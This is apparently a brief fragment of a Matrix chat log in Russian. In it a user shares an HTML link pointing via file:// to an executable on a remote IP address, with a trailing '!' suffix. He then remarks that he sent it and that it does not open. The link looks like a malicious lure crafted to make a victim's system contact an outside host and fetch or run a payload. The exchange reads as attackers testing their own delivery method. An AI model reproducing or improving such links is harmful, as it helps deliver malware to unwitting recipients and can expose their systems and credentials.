<a href="file://185.113.8.216/put.exe!ss">Link item</a>
2024-02-16 11:56:52
@lapa:matrix.bestflowers247.online
я вот такое прослал
2024-02-16 11:56:53
@lapa:matrix.bestflowers247.online
нифига
2024-02-16 11:56:56
@lapa:matrix.bestflowers247.online
не открывает